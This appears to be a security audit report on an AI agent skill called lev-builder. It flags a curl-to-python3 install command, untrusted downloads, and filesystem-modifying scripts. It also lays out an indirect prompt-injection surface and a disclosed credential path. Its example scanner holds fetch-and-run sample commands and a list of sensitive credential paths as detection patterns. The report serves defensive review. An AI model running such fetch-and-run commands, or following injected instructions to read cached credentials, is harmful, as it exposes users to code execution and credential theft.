lev-builder
Fail
Audited by Gen Agent Trust Hub on Mar 1, 2026
Risk Level: HIGH
Flags: REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION, DATA_EXFILTRATION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation in `references/setup.md` provides a command that downloads a Python script from an untrusted GitHub repository (yusufkaraaslan/Skill_Seekers) and executes it with the `curl -fsSL ... | python3` pattern. Whatever the server returns is run immediately, with no on-disk copy to review and no checksum or signature check, so a compromised repository, account or transit path yields code execution on the developer's machine.
- [EXTERNAL_DOWNLOADS]: The skill requires downloading and installing software from an unverified third-party GitHub account (yusufkaraaslan) that is not on the trusted vendors list.
- [COMMAND_EXECUTION]: The workflow runs shell scripts such as `apply-patch.sh` and `migrate-skill.sh` that modify the filesystem in core production directories (`~/lev/core/`) based on external inputs such as design documents.
- [PROMPT_INJECTION]: The skill has a large surface for indirect prompt injection: it processes data from arbitrary websites and GitHub repositories through the `skill-seekers` tool, and that ingested data can influence subsequent agent actions such as code generation or patching.
  - Ingestion points: `skill-seekers scrape` (external URLs) and `skill-seekers github` (external repositories), as documented in `references/advanced-workflows.md`.
  - Boundary markers: none identified in the scraping or patching logic, so nothing distinguishes instructions embedded in scraped content from the operator's own instructions.
  - Capability inventory: filesystem writes via `apply-patch.sh`, code execution via `bun test` and `bun run typecheck`, and repository modification via `git commit`.
  - Sanitization: no evidence of escaping or validation of external content before it is used in patches or commands.
- [DATA_EXFILTRATION]: The documentation in `references/config-resolution.md` discloses sensitive file locations, specifically `~/.local/share/lev/auth/`, which is documented to contain cached credentials. This creates a risk of targeted data exposure: any injected instruction that can drive a file read knows exactly which path to target.
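The three document-level findings above (an install command piped straight into an interpreter, a download from an origin outside the trusted list, and a disclosed credential path) can be checked mechanically before a skill is approved. The scanner below is an added example written for this page; it is not part of the lev-builder skill or of the Trust Hub tooling. The sample document lines, the raw-GitHub URL path, the `example.com` bootstrap line and the `TRUSTED_GITHUB_OWNERS` allowlist are all constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample of skill documentation lines modelled on the findings above.
# This is NOT the real references/setup.md; the install.py path and the
# example.com line are invented so the scanner has something to flag.
SAMPLE_DOC = """\
# Setup
curl -fsSL https://raw.githubusercontent.com/yusufkaraaslan/Skill_Seekers/main/install.py | python3
git clone https://github.com/yusufkaraaslan/Skill_Seekers
pip install requests
# Config resolution
Cached credentials live in ~/.local/share/lev/auth/ and are read on startup.
wget -qO- https://example.com/bootstrap.sh | sh
"""

# Assumed allowlist: GitHub owners this organisation has reviewed. Anything
# else is treated as an untrusted external download origin.
TRUSTED_GITHUB_OWNERS = {"python", "pypa"}

# Paths whose mention in docs is worth a second look, per the audit finding.
SENSITIVE_PATHS = ("~/.local/share/lev/auth/", "~/.ssh/", "~/.aws/credentials")

# curl/wget output piped into a shell or language interpreter, optionally via sudo.
PIPE_TO_INTERPRETER = re.compile(
    r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(python3?|bash|sh|zsh|node|perl)\b"
)
# Captures the owner segment of github.com / raw.githubusercontent.com URLs.
GITHUB_REF = re.compile(
    r"https?://(?:raw\.)?github(?:usercontent)?\.com/([A-Za-z0-9_.-]+)/"
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    category: str
    detail: str


def scan_doc(text: str) -> list[Finding]:
    """Return one Finding per risky pattern, in line order, for a documentation blob."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        if PIPE_TO_INTERPRETER.search(line):
            findings.append(Finding(
                n, "REMOTE_CODE_EXECUTION",
                "download piped straight into an interpreter; no on-disk copy, no integrity check",
            ))
        for owner in GITHUB_REF.findall(line):
            if owner not in TRUSTED_GITHUB_OWNERS:
                findings.append(Finding(
                    n, "EXTERNAL_DOWNLOADS",
                    f"GitHub owner {owner!r} is not on the trusted list",
                ))
        for path in SENSITIVE_PATHS:
            if path in line:
                findings.append(Finding(
                    n, "DATA_EXFILTRATION",
                    f"documents the location of a credential store: {path}",
                ))
    return findings


if __name__ == "__main__":
    for f in scan_doc(SAMPLE_DOC):
        print(f"line {f.line_no}: [{f.category}] {f.detail}")
```

Running it against the constructed sample reports five findings: the `curl | python3` line is flagged twice (interpreter pipe and untrusted owner), the `git clone` line once for the owner, the credentials sentence once, and the `wget | sh` line once. A real reviewer would run `scan_doc` over every file under `references/` and treat any REMOTE_CODE_EXECUTION hit as blocking.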
Recommendations
- AI detected serious security threats
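A concrete mitigation for the REMOTE_CODE_EXECUTION finding, shown here as an added example rather than code from lev-builder or Skill_Seekers: fetch the installer into memory, compare it against a SHA-256 digest that was pinned when the script was reviewed, and only then write it to disk and execute it. `SAMPLE_SCRIPT` and the `example.invalid` URL are constructed stand-ins; `http_fetch` is included for real use but is not exercised, so the example runs offline.

```python
import hashlib
import subprocess
import sys
import tempfile
from typing import Callable


class IntegrityError(Exception):
    """Raised when downloaded content does not match the pinned digest."""


# Constructed stand-in for the installer that the real setup doc pipes into python3.
SAMPLE_SCRIPT = b'print("installer ran")\n'


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fetch_and_verify(fetch: Callable[[str], bytes], url: str, pinned_sha256: str) -> bytes:
    """Fetch `url` with the supplied fetcher and return its bytes only if their
    SHA-256 equals the digest pinned at review time. Nothing is executed, and
    nothing touches disk, before this check passes."""
    data = fetch(url)
    actual = sha256_hex(data)
    if actual != pinned_sha256.lower():
        raise IntegrityError(f"{url}: expected sha256 {pinned_sha256}, got {actual}")
    return data


def run_verified_script(data: bytes) -> int:
    """Write already-verified bytes to a temp file and run them with the current
    interpreter. Unlike `curl | python3`, the executed copy exists on disk, so it
    can be inspected, archived or diffed against the reviewed version later."""
    with tempfile.NamedTemporaryFile("wb", suffix=".py", delete=False) as fh:
        fh.write(data)
        path = fh.name
    return subprocess.run([sys.executable, path], check=False).returncode


def http_fetch(url: str) -> bytes:
    """Real fetcher for production use; kept separate so tests can inject a stub."""
    from urllib.request import urlopen
    with urlopen(url, timeout=30) as resp:
        return resp.read()


if __name__ == "__main__":
    # In practice the pin is copied from the reviewed release, not computed here.
    pin = sha256_hex(SAMPLE_SCRIPT)
    verified = fetch_and_verify(lambda _u: SAMPLE_SCRIPT, "https://example.invalid/install.py", pin)
    print("exit status", run_verified_script(verified))
```

The pin must come from an out-of-band review of the exact script version, not from the same download, otherwise the check only proves the file survived transit. A tampered response (the test appends one extra line) fails closed with `IntegrityError` before anything is written or run.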
Audit Metadata